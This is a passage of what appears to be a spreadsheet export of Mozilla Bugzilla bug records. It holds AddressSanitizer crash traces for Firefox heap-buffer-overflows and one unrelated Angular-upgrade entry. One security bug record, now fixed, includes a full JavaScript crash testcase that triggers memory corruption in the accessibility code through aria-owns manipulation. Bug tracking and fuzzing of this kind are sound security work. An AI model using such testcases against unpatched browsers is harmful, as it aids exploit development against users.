    #7 0x7ffdaa2e7675 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(class mozilla::detail::BaseAutoLock&lt;class mozilla::Mutex &amp;&gt; const &amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:876
    #8 0x7ffdaa2e2dc5 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(class mozilla::detail::BaseAutoLock&lt;class mozilla::Mutex &amp;&gt; const &amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:699
    #9 0x7ffdaa2e3a14 in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:485
    #10 0x7ffdaa309111 in mozilla::TaskController::TaskController::&lt;lambda_5&gt;::operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:211
    #11 0x7ffdaa309111 in mozilla::detail::RunnableFunction&lt;`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:211:7'&gt;::Run /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:548
    #12 0x7ffdaa339bc5 in nsThread::ProcessNextEvent(bool, bool *) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1198
    #13 0x7ffdaa34aa8a in NS_ProcessNextEvent(class nsIThread *, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:480
    #14 0x7ffdaba43477 in mozilla::ipc::MessagePump::Run(class base::MessagePump::Delegate *) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #15 0x7ffdab960483 in MessageLoop::RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:370
    #16 0x7ffdab960483 in MessageLoop::RunHandler(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:363
    #17 0x7ffdab96024a in MessageLoop::Run(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:345
    #18 0x7ffdb40b3a1c in nsBaseAppShell::Run(void) /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:148
    #19 0x7ffdb42f6487 in nsAppShell::Run(void) /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:824
    #20 0x7ffdb894682b in nsAppStartup::Run(void) /builds/worker/checkouts/gecko/toolkit/components/startup/nsAppStartup.cpp:296
    #21 0x7ffdb8c90586 in XREMain::XRE_mainRun(void) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5680
    #22 0x7ffdb8c95b17 in XREMain::XRE_main(int, char **const, struct mozilla::BootstrapConfig const &amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5889
    #23 0x7ffdb8c96c3f in XRE_main(int, char **const, struct mozilla::BootstrapConfig const &amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5945
    #24 0x7ff74be320d8 in do_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:227
    #25 0x7ff74be320d8 in NS_internal_main(int, char **, char **) /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:445
    #26 0x7ff74be314d8 in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:151
    #27 0x7ff74bf14207 in invoke_main D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:90
    #28 0x7ff74bf14207 in __scrt_common_main_seh D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #29 0x7ffe18107343  (C:\WINDOWS\System32\KERNEL32.DLL+0x180017343)
    #30 0x7ffe192e26b0  (C:\WINDOWS\SYSTEM32\ntdll.dll+0x1800526b0)
0x12959aa2c548 is located 56 bytes before 608-byte region [0x12959aa2c580,0x12959aa2c7e0)
allocated by thread T0 here:
    #0 0x7ffdc70150e4 in calloc /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:114
    #1 0x7ffdaa17a054 in PLDHashTable::MakeEntryHandle(void const *, struct std::nothrow_t const &amp;) /builds/worker/checkouts/gecko/xpcom/ds/PLDHashTable.cpp:630
    #2 0x7ffdaa17b080 in PLDHashTable::MakeEntryHandle(void const *) /builds/worker/checkouts/gecko/xpcom/ds/PLDHashTable.cpp:674
    #3 0x7ffdad9047bc in PLDHashTable::WithEntryHandle&lt;class `protected: class mozilla::IdentifierMapEntry * __cdecl nsTHashtable&lt;class mozilla::IdentifierMapEntry&gt;::WithEntryHandle&lt;class `public: class mozilla::IdentifierMapEntry * __cdecl nsTHashtable&lt;class mozilla::IdentifierMapEntry&gt;::PutEntry(struct mozilla::IdentifierMapEntry::DependentAtomOrString const &amp;)'::`1'::&lt;lambda_1&gt;&gt;(struct mozilla::IdentifierMapEntry::DependentAtomOrString const &amp;, class `public: class mozilla::IdentifierMapEntry * __cdecl nsTHashtable&lt;class mozilla::IdentifierMapEntry&gt;::PutEntry(struct mozilla::IdentifierMapEntry::DependentAtomOrString const &amp;)'::`1'::&lt;lambda_1&gt; &amp;&amp;)'::`1'::&lt;lambda_1&gt;&gt;(void const *, class `protected: class mozilla::IdentifierMapEntry * __cdecl nsTHashtable&lt;class mozilla::IdentifierMapEntry&gt;::WithEntryHandle&lt;class `public: class mozilla::IdentifierMapEntry * __cdecl nsTHashtable&lt;class mozilla::IdentifierMapEntry&gt;::PutEntry(struct mozilla::IdentifierMapEntry::DependentAtomOrString const &amp;)'::`1'::&lt;lambda_1&gt;&gt;(struct mozilla::IdentifierMapEntry::DependentAtomOrString const &amp;, class `public: class mozilla::IdentifierMapEntry * __cdecl nsTHashtable&lt;class mozilla::IdentifierMapEntry&gt;::PutEntry(struct mozilla::IdentifierMapEntry::DependentAtomOrString const &amp;)'::`1'::&lt;lambda_1&gt; &amp;&amp;)'::`1'::&lt;lambda_1&gt; &amp;&amp;) /builds/worker/checkouts/gecko/xpcom/ds/PLDHashTable.h:605
    #4 0x7ffdad8c7437 in nsTHashtable&lt;mozilla::IdentifierMapEntry&gt;::WithEntryHandle /builds/worker/checkouts/gecko/xpcom/ds/nsTHashtable.h:434
    #5 0x7ffdad8c7437 in nsTHashtable&lt;mozilla::IdentifierMapEntry&gt;::PutEntry /builds/worker/checkouts/gecko/xpcom/ds/nsTHashtable.h:306
    #6 0x7ffdad8c7437 in mozilla::dom::ShadowRoot::AddToIdTable(class mozilla::dom::Element *, class nsAtom *) /builds/worker/checkouts/gecko/dom/base/ShadowRoot.cpp:553
    #7 0x7ffdad736a6b in mozilla::dom::Element::AddToIdTable /builds/worker/checkouts/gecko/dom/base/Element.cpp:1136
    #8 0x7ffdad736a6b in mozilla::dom::Element::BindToTree(struct mozilla::dom::BindContext &amp;, class nsINode &amp;) /builds/worker/checkouts/gecko/dom/base/Element.cpp:1921
    #9 0x7ffdad5895fa in nsStyledElement::BindToTree(struct mozilla::dom::BindContext &amp;, class nsINode &amp;) /builds/worker/checkouts/gecko/dom/base/nsStyledElement.cpp:210
    #10 0x7ffdb105236a in nsGenericHTMLElement::BindToTree(struct mozilla::dom::BindContext &amp;, class nsINode &amp;) /builds/worker/checkouts/gecko/dom/html/nsGenericHTMLElement.cpp:466
    #11 0x7ffdada4edaf in nsINode::InsertChildBefore(class nsIContent *, class nsIContent *, bool, class mozilla::ErrorResult &amp;) /builds/worker/checkouts/gecko/dom/base/nsINode.cpp:1613
    #12 0x7ffdb4a35013 in nsINode::AppendChildTo /builds/worker/checkouts/gecko/dom/base/nsINode.h:967
    #13 0x7ffdb4a35013 in mozilla::AccessibleCaret::CreateCaretElement::&lt;lambda_1&gt;::operator() /builds/worker/checkouts/gecko/layout/base/AccessibleCaret.cpp:237
    #14 0x7ffdb4a35013 in mozilla::AccessibleCaret::CreateCaretElement(void) const /builds/worker/checkouts/gecko/layout/base/AccessibleCaret.cpp:240
    #15 0x7ffdb4a31d44 in mozilla::AccessibleCaret::InjectCaretElement(class mozilla::dom::Document *) /builds/worker/checkouts/gecko/layout/base/AccessibleCaret.cpp:199
    #16 0x7ffdb4a3ba06 in mozilla::AccessibleCaret::AccessibleCaret /builds/worker/checkouts/gecko/layout/base/AccessibleCaret.cpp:82
    #17 0x7ffdb4a3ba06 in mozilla::MakeUnique&lt;class mozilla::AccessibleCaret, class mozilla::PresShell *&amp;&gt;(class mozilla::PresShell *&amp;) /builds/worker/workspace/obj-build/dist/include/mozilla/UniquePtr.h:605
    #18 0x7ffdb4a37baa in mozilla::AccessibleCaretManager::AccessibleCaretManager /builds/worker/checkouts/gecko/layout/base/AccessibleCaretManager.cpp:86
    #19 0x7ffdb4a37baa in mozilla::MakeUnique /builds/worker/workspace/obj-build/dist/include/mozilla/UniquePtr.h:605
    #20 0x7ffdb4a37baa in mozilla::AccessibleCaretEventHub::Init(void) /builds/worker/checkouts/gecko/layout/base/AccessibleCaretEventHub.cpp:365
    #21 0x7ffdb4a7d9fa in mozilla::PresShell::Init(class nsPresContext *, class nsViewManager *) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:907
    #22 0x7ffdad68ca47 in mozilla::dom::Document::CreatePresShell(class nsPresContext *, class nsViewManager *) /builds/worker/checkouts/gecko/dom/base/Document.cpp:6948
    #23 0x7ffdb4bb1924 in nsDocumentViewer::InitPresentationStuff(bool) /builds/worker/checkouts/gecko/layout/base/nsDocumentViewer.cpp:702
    #24 0x7ffdb4bb1279 in nsDocumentViewer::InitInternal(class nsIWidget *, class nsISupports *, class mozilla::dom::WindowGlobalChild *, struct mozilla::gfx::IntRectTyped&lt;struct mozilla::gfx::UnknownUnits&gt; const &amp;, bool, bool, bool) /builds/worker/checkouts/gecko/layout/base/nsDocumentViewer.cpp:909
    #25 0x7ffdb4bb08bf in nsDocumentViewer::Init(class nsIWidget *, struct mozilla::gfx::IntRectTyped&lt;struct mozilla::gfx::UnknownUnits&gt; const &amp;, class mozilla::dom::WindowGlobalChild *) /builds/worker/checkouts/gecko/layout/base/nsDocumentViewer.cpp:675
    #26 0x7ffdb7d25722 in nsDocShell::SetupNewViewer(class nsIContentViewer *, class mozilla::dom::WindowGlobalChild *) /builds/worker/checkouts/gecko/docshell/base/nsDocShell.cpp:8129
    #27 0x7ffdb7d23f5c in nsDocShell::Embed(class nsIContentViewer *, class mozilla::dom::WindowGlobalChild *, bool, bool, class nsIRequest *, class nsIURI *) /builds/worker/checkouts/gecko/docshell/base/nsDocShell.cpp:5603
    #28 0x7ffdb7d32fa2 in nsDocShell::CreateAboutBlankContentViewer(class nsIPrincipal *, class nsIPrincipal *, class nsIContentSecurityPolicy *, class nsIURI *, bool, class mozilla::Maybe&lt;enum nsILoadInfo::CrossOriginEmbedderPolicy&gt; const &amp;, bool, bool, class mozilla::dom::WindowGlobalChild *) /builds/worker/checkouts/gecko/docshell/base/nsDocShell.cpp:6685
    #29 0x7ffdb7e8065f in nsAppShellService::JustCreateTopWindow(class nsIAppWindow *, class nsIURI *, unsigned int, int, int, bool, class mozilla::AppWindow **) /builds/worker/checkouts/gecko/xpfe/appshell/nsAppShellService.cpp:716
    #30 0x7ffdb7e812a4 in nsAppShellService::CreateTopLevelWindow(class nsIAppWindow *, class nsIURI *, unsigned int, int, int, class nsIAppWindow **) /builds/worker/checkouts/gecko/xpfe/appshell/nsAppShellService.cpp:179
    #31 0x7ffdb8949c5d in nsAppStartup::CreateChromeWindow(class nsIWebBrowserChrome *, unsigned int, class nsIOpenWindowInfo *, bool *, class nsIWebBrowserChrome **) /builds/worker/checkouts/gecko/toolkit/components/startup/nsAppStartup.cpp:757
    #32 0x7ffdb8b00951 in nsWindowWatcher::CreateChromeWindow(class nsIWebBrowserChrome *, unsigned int, class nsIOpenWindowInfo *, class nsIWebBrowserChrome **) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:437
    #33 0x7ffdb8afc3ca in nsWindowWatcher::OpenWindowInternal(class mozIDOMWindowProxy *, class nsTSubstring&lt;char&gt; const &amp;, class nsTSubstring&lt;char&gt; const &amp;, class nsTSubstring&lt;char&gt; const &amp;, bool, bool, bool, class nsIArray *, bool, bool, bool, enum nsPIWindowWatcher::PrintKind, class nsDocShellLoadState *, class mozilla::dom::BrowsingContext **) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:1045
    #34 0x7ffdb8af7e36 in nsWindowWatcher::OpenWindow(class mozIDOMWindowProxy *, class nsTSubstring&lt;char&gt; const &amp;, class nsTSubstring&lt;char&gt; const &amp;, class nsTSubstring&lt;char&gt; const &amp;, class nsISupports *, class mozIDOMWindowProxy **) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:293
    #35 0x7ffdbc685471 in XPTC__InvokebyIndex (E:\firefox_asan\target\firefox\xul.dll+0x193015471)
SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/checkouts/gecko/widget/windows/nsWindow.cpp:8197 in nsWindow::PickerOpen(void)
Shadow bytes around the buggy address:
  0x12959aa2c280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x12959aa2c300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x12959aa2c380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x12959aa2c400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x12959aa2c480: 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x12959aa2c500: fa fa fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa
  0x12959aa2c580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x12959aa2c600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x12959aa2c680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x12959aa2c700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x12959aa2c780: 00 00 00 00 00 00 00 00 00 00 00 00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36900==ABORTING
```</t>
        </is>
      </c>
      <c r="X814" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="815">
      <c r="A815" t="n">
        <v>1160082</v>
      </c>
      <c r="B815" t="inlineStr">
        <is>
          <t>2015-04-30 02:21:07 -0700</t>
        </is>
      </c>
      <c r="C815" t="inlineStr">
        <is>
          <t>Update to Angular 1.4</t>
        </is>
      </c>
      <c r="D815" t="inlineStr">
        <is>
          <t>2015-06-03 10:34:46 -0700</t>
        </is>
      </c>
      <c r="E815" t="n">
        <v>1</v>
      </c>
      <c r="F815" t="n">
        <v>1</v>
      </c>
      <c r="G815" t="n">
        <v>7</v>
      </c>
      <c r="H815" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I815" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J815" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K815" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L815" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M815" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N815" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O815" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P815" t="inlineStr"/>
      <c r="Q815" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R815" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S815" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T815" t="n">
        <v>1</v>
      </c>
      <c r="U815" t="n">
        <v>0</v>
      </c>
      <c r="V815" t="n">
        <v>16</v>
      </c>
      <c r="W815" t="inlineStr">
        <is>
          <t>We're currently using v1.3.0 and the 1.3.x releases since mention perf fixes several times:
https://github.com/angular/angular.js/blob/master/CHANGELOG.md</t>
        </is>
      </c>
      <c r="X815" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="816">
      <c r="A816" t="n">
        <v>1356985</v>
      </c>
      <c r="B816" t="inlineStr">
        <is>
          <t>2017-04-17 00:35:03 -0700</t>
        </is>
      </c>
      <c r="C816" t="inlineStr">
        <is>
          <t>heap-buffer-overflow in mozilla::a11y::DocAccessible::PutChildrenBack</t>
        </is>
      </c>
      <c r="D816" t="inlineStr">
        <is>
          <t>2024-05-30 09:32:00 -0700</t>
        </is>
      </c>
      <c r="E816" t="n">
        <v>1</v>
      </c>
      <c r="F816" t="n">
        <v>1</v>
      </c>
      <c r="G816" t="n">
        <v>3</v>
      </c>
      <c r="H816" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I816" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J816" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K816" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L816" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M816" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N816" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O816" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P816" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main55+] fixed by bug 1362063</t>
        </is>
      </c>
      <c r="Q816" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R816" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S816" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T816" t="n">
        <v>1</v>
      </c>
      <c r="U816" t="n">
        <v>0</v>
      </c>
      <c r="V816" t="n">
        <v>12</v>
      </c>
      <c r="W816" t="inlineStr">
        <is>
          <t>The following testcase crashes the latest ASAN build of Firefox.
crash.html:
&lt;script&gt;
function start() {
	try{fuzzPriv.enableAccessibility();}catch(e){ };
	o5=document;
	o105=document.documentElement;
	document.documentElement.innerHTML="&lt;figcaption id='id16'&gt;&lt;style' id='id29'&gt;";
	o252=document.createElement('audio');
	o253=document.createElement('track');
	o252.appendChild(o253);
	o5.write('&lt;html&gt;&lt;body&gt;&lt;div&gt;');
	o256=o5.all[2];
	o252.controls^=1;
	o5.documentElement.appendChild(o252);
	o5.defaultView.onerror=fun1;
	setTimeout(fun0, 4);
}
function fun0() {
	document.documentElement.style.transform='scale(0.1)';
	o348=document.createElement('style');
	o349=document.createTextNode("@import url('data:text/css,.class0{display:inline;mask-repeat:round;}')");
	o348.appendChild(o349);
	o350=document.createElement('iframe');
	try{document.documentElement.animate([{background: '-moz-element(#id4)',},{}],100);}catch(e){}
	document.documentElement.appendChild(o105);
	document.documentElement.appendChild(o350);
	document.documentElement.appendChild(o348);
	o256.classList.toggle('class0');
}
var c=0;
function fun1() {
	if(c++!=1) return;
	o314=document.createElement("form");
	document.documentElement.appendChild(o314);
	o256.id='id14';
	o350.setAttribute('aria-owns','id29 id36 id4 id4');
	o314.setAttribute('aria-owns','id52 id14 id39 id47 id54 id16 id16 id29');
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==6299==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020001ebe28 at pc 0x7f663ff03f2a bp 0x7ffe5e40bc50 sp 0x7ffe5e40bc48
READ of size 8 at 0x6020001ebe28 thread T0 (Web Content)
    #0 0x7f663ff03f29 in ~RefPtr /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:77:9
    #1 0x7f663ff03f29 in Destruct /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:560
    #2 0x7f663ff03f29 in DestructRange /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2007
    #3 0x7f663ff03f29 in RemoveElementsAt /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2055
    #4 0x7f663ff03f29 in mozilla::a11y::DocAccessible::PutChildrenBack(nsTArray&lt;RefPtr&lt;mozilla::a11y::Accessible&gt; &gt;*, unsigned int) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2204
    #5 0x7f663ff0492d in mozilla::a11y::DocAccessible::DoARIAOwnsRelocation(mozilla::a11y::Accessible*) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2153:3
    #6 0x7f663fe70b7c in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:805:18
    #7 0x7f663d89051e in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1738:12
    #8 0x7f663d89fa23 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:299:7
    #9 0x7f663d89f6f4 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:321:5
    #10 0x7f663d8a1d5b in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:711:5
    #11 0x7f663d8a1d5b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:624
    #12 0x7f663d8a1a59 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:525:9
    #13 0x7f663e0ebc64 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:64:16
    #14 0x7f6638378647 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #15 0x7f6638036d46 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1512:28
    #16 0x7f6637f96880 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1872:25
    #17 0x7f6637f930c7 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1807:17
    #18 0x7f6637f954f4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1680:5
    #19 0x7f6637f95af6 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1713:15
    #20 0x7f66371e3b90 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #21 0x7f66371e05d8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #22 0x7f6637f9de01 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #23 0x7f6637efffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #24 0x7f6637efffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #25 0x7f6637efffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #26 0x7f663d2125ff in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #27 0x7f6640816a17 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:875:22
    #28 0x7f6637efffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #29 0x7f6637efffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #30 0x7f6637efffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #31 0x7f664081640f in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:699:34
    #32 0x4eb5c3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #33 0x4eb5c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #34 0x7f665290382f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #35 0x41cf18 in _start (/home/nils/fuzzer3/firefox/firefox+0x41cf18)
0x6020001ebe28 is located 8 bytes to the left of 16-byte region [0x6020001ebe30,0x6020001ebe40)
allocated by thread T0 (Web Content) here:
    #0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x7f663703f450 in Alloc /home/worker/workspace/build/src/xpcom/string/nsSubstring.cpp:242:22
    #2 0x7f663703f450 in nsAString::MutatePrep(unsigned int, char16_t**, unsigned int*) /home/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:155
    #3 0x7f6637046fb5 in nsAString::ReplacePrepInternal(unsigned int, unsigned int, unsigned int, unsigned int) /home/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:217:8
    #4 0x7f6637046e05 in nsAString::ReplacePrep(unsigned int, unsigned int, unsigned int) /home/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:207:10
    #5 0x7f663704977e in nsAString::Replace(unsigned int, unsigned int, char16_t) /home/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:534:7
    #6 0x7f663fe6007d in mozilla::a11y::NotificationController::QueueMutationEvent(mozilla::a11y::AccTreeMutationEvent*) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:205:28
    #7 0x7f663fee54ef in mozilla::a11y::Accessible::MoveChild(unsigned int, mozilla::a11y::Accessible*) /home/worker/workspace/build/src/accessible/generic/Accessible.cpp:2208:47
    #8 0x7f663ff05494 in mozilla::a11y::DocAccessible::MoveChild(mozilla::a11y::Accessible*, mozilla::a11y::Accessible*, int) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2232:16
    #9 0x7f663ff0479d in mozilla::a11y::DocAccessible::DoARIAOwnsRelocation(mozilla::a11y::Accessible*) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2144:9
    #10 0x7f663fe70b7c in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:805:18
    #11 0x7f663d89051e in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1738:12
    #12 0x7f663d89fa23 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:299:7
    #13 0x7f663d89f6f4 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:321:5
    #14 0x7f663d8a1d5b in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:711:5
    #15 0x7f663d8a1d5b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:624
    #16 0x7f663d8a1a59 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:525:9
    #17 0x7f663e0ebc64 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:64:16
    #18 0x7f6638378647 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #19 0x7f6638036d46 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1512:28
    #20 0x7f6637f96880 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1872:25
    #21 0x7f6637f930c7 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1807:17
    #22 0x7f6637f954f4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1680:5
    #23 0x7f6637f95af6 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1713:15
    #24 0x7f66371e3b90 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
